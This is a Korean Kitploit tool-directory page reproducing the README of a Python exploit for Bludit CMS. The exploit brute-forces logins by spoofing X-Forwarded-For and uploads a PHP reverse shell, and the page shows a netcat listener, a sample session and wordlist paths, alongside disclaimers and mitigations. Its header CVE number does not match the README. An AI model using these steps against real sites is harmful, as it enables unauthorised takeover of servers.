Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2016-16113-POC — cve-2016-16113 | Kitploit
도구/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
Password AttacksPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

저장소 보기
128개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RCE 획득 - Bludit CMS 익스플로잇

root@kitploit:~
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

CVE-2019-17240(인증 우회)와 CVE-2019-16113(임의 파일 업로드)를 결합하여 취약한 Bludit CMS 설치에서 원격 코드 실행을 달성하는 자동화된 익스플로잇 도구입니다.

⚠️ 법적 고지

승인된 보안 테스트 전용

이 도구는 합법적인 경계 내에서 수행되는 공인된 침투 테스트 및 보안 연구를 수행하는 보안 전문가를 대상으로 합니다. 승인되지 않은 컴퓨터 시스템에 대한 무단 접근은 미국의 컴퓨터 사기 및 남용법(CFAA) 및 전 세계의 유사한 법률에 따라 불법입니다.

이 도구를 사용함으로써 귀하는 다음에 동의하는 것으로 간주됩니다:

  • 귀하가 소유하거나 테스트에 대한 명시적 서면 허가를 받은 시스템만 테스트합니다.
  • 모든 해당 지역, 주 및 연방법을 준수합니다.
  • 귀하의 행동에 대한 전적인 책임을 수락합니다.

저자는 어떠한 책임도 지지 않으며 이 도구의 오용이나 손해에 대해 책임을 지지 않습니다.

📋 개요

이 익스플로잇은 다음 과정을 자동화합니다:

  1. 대상 가용성 확인
  2. 무차별 대입을 통한 인증 우회 (CVE-2019-17240 활용)
  3. 악성 PHP 리버스 셸 업로드 (CVE-2019-16113 악용)
  4. 리버스 셸 연결 설정

취약점 세부 정보

  • CVE-2019-17240: 부적절한 속도 제한 구현을 통한 인증 우회 (X-Forwarded-For 헤더 조작으로 우회)
  • CVE-2019-16113: 악성 PHP 코드 실행을 허용하는 임의 파일 업로드 취약점

영향 받는 버전: Bludit CMS 3.9.2 이하

🚀 기능

  • ✅ 자동화된 대상 가용성 확인
  • ✅ 무차별 대입을 통한 인증 우회
  • ✅ 사용자 이름 열거 기능
  • ✅ 사용자 이름 + 비밀번호 결합 무차별 대입
  • ✅ 자동 CSRF 토큰 처리
  • ✅ PHP 리버스 셸 페이로드 생성
  • ✅ .htaccess 업로드로 익스플로잇 향상
  • ✅ 연결 확인

📦 요구 사항

  • Python 3.6+
  • 필요한 Python 패키지:
    • requests

🔧 설치

root@kitploit:~
# 리포지토리 클론
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# 의존성 설치
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.25.0

💻 사용법

기본 사용법

root@kitploit:~
python3 get_rce.py

스크립트가 다음 정보를 묻습니다:

  1. 대상 URL (예: https://target.com)
  2. 리스너의 IP 주소
  3. 리스너의 포트
  4. 사용자 이름 무차별 대입 여부
  5. 단어 목록 위치

리스너 설정

익스플로잇을 실행하기 전에 netcat 리스너를 설정하세요:

root@kitploit:~
nc -lvnp 4444

4444를 선택한 포트로 바꾸세요.

예제 세션

root@kitploit:~
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

공격 모드

모드 1: 알려진 사용자 이름 + 비밀번호 무차별 대입

root@kitploit:~
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

모드 2: 전체 자격 증명 무차별 대입

root@kitploit:~
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 권장 단어 목록

  • SecLists: https://github.com/danielmiessler/SecLists

    • 사용자 이름: SecLists/Usernames/Names/names.txt
    • 비밀번호: SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 작동 방식

  1. 대상 검증: 대상에 연결 가능한지 확인
  2. 인증 우회:
    • X-Forwarded-For 헤더를 조작하여 속도 제한 우회
    • 제공된 단어 목록을 사용하여 자격 증명 무차별 대입
    • CSRF 토큰 자동 처리
  3. 익스플로잇:
    • /bl-content/tmp/에 PHP 리버스 셸 업로드
    • 실행 보장을 위해 .htaccess 파일 업로드
    • 페이로드를 트리거하여 리버스 셸 설정
  4. 셸 접근: 리스너로 다시 연결

🛡️ 방어 조치

시스템 관리자인 경우:

  • 즉시 Bludit 3.9.3 이상으로 업데이트하세요.
  • IP가 아닌 세션 기반의 적절한 속도 제한을 구현하세요.
  • 모든 파일 업로드를 검증하세요 (유형, 확장자, 내용).
  • 웹 애플리케이션 방화벽(WAF)을 사용하세요.
  • /bl-content/tmp/ 디렉터리에서 의심스러운 파일을 모니터링하세요.
  • 강력한 비밀번호 정책을 시행하세요.
  • 계정 잠금 메커니즘을 활성화하세요.

🐛 문제 해결

문제: "대상이 다운된 것 같습니다"

  • URL이 올바르고 프로토콜(http/https)을 포함하는지 확인하세요.
  • 네트워크 연결을 확인하세요.
  • 대상이 실제로 Bludit을 실행 중인지 확인하세요.

문제: "로그인 실패"

  • 자격 증명이 올바른지 확인하세요.
  • 더 포괄적인 단어 목록을 시도해 보세요.
  • 대상에 추가 인증 메커니즘이 있는지 확인하세요.

문제: "셸을 받지 못했습니다"

  • 리스너가 실행 중인지 확인하세요.
  • 양쪽의 방화벽 규칙을 확인하세요.
  • 리스너 IP와 포트가 올바르고 연결 가능한지 확인하세요.

🔗 참조

  • CVE-2019-17240 세부 정보
  • CVE-2019-16113 세부 정보
  • Bludit 공식 웹사이트

👤 저자

d3vn0mi

📄 라이선스

이 프로젝트는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 이 README 상단의 고지 사항을 참조하세요.

🤝 기여

기여, 문제 제기 및 기능 요청은 환영합니다! issues 페이지를 확인해 주세요.

⭐ 감사의 말

  • 이러한 취약점을 발견하고 문서화한 보안 연구 커뮤니티
  • 신속하게 패치를 제공한 Bludit 팀
도구 다운로드